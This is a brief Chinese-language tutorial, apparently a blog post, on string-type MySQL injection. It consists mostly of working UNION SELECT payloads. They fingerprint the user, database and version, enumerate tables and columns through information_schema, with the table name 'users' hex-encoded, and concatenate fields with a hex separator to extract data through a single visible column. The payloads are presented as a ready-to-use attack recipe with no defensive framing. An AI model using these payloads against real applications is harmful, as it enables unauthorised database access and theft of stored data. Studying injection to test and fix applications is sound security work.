MYSQL注入语句实用精解_MySQL

MYSQL注入语句实用精解

只讲字符型。

order by XX

Union select .....

1' UNION SELECT 1,CONCAT(user(),0x3a,database(),0x3a,version()) # 这两句是等价的。

1' UNION SELECT 1,CONCAT_WS(CHAR(58),user(),database(),version()) #

上面是字符型的，注释符为 # ， CONCAT_WS 为用分隔符隔开连接的字符。

获取数据库等的信息

1' UNION SELECT 1,concat(table_name) from information_schema.tables where table_schema=database() #

concat产生只是字符串连接，不用也可以，也应该可以把所有表输出。table_name 和 table_schema 是 information_schema中tables表中的一个字段。

1' UNION SELECT 1,concat(column_name) from information_schema.columns where table_name=0x7573657273 #

0x7573657273这个是users的十六进制表示形式。这个users只是一个特例而已。主要根据上面获得表中字段值进行查询。到了这里，数据库知道了，表知道了，表的字段也知道了。剩下的还不会查吗。直接union 查。

库information_schema 中的表tables 有 table_schema(数据库名) 和 table_name(表名) 两个主要字段

库information_schema 中的表columns 有 table_name(表名) 和 column_name(列名) 两主要字段

就算是 order by 出来只有一个可以显示也没关系。可以用concat

如： concat(字段,0x3a,字段) 把两个字段显示出来了。中间那个是 ： 的十六进制表示形式。